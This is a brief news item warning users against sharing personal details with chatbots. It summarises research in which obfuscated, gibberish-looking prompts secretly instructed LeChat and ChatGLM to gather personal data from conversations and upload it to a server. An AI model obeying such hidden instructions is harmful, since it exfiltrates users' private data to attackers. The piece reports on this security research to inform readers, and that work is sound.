LLM

The Risks of Including Personal Details in AI Chats

PSA: Here's another reason not to include personal details in AI chats

Security researchers have discovered a way to instruct AI chatbots to gather personal data from conversations and upload it to a server, raising concerns about privacy and security in AI chats. The researchers tested the method on two large language models, LeChat by French AI company Mistral and Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts which secretly contain malicious instructions obfuscated as gibberish only understandable by the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, these kinds of attacks are likely to become more widespread.

#LLM

Latest News

Apple

Shocking Theft and Tragic Bird Incident: A Week of Unusual Events in the Apple World

12 hours ago

Android

Android 16 Beta 4 Introduces Subtle But Noticeable Changes to Status Bar Clock Design

1 day ago

iPhone

Revolutionizing Gaming on iOS: AltStore Classic Brings Full-Speed Switch Emulation to iPhones and iPads in the EU

1 day ago

Apple

Indie Spotlight: ‘Ping Pong Club’ Serves Up Realistic Table Tennis on Apple Vision Pro

1 day ago

Apple

Why Apple's iMessage Still Struggles with AVIF Image Files

1 day ago

Apple

Simplifying macOS Updates for IT and End Users in 2025

1 day ago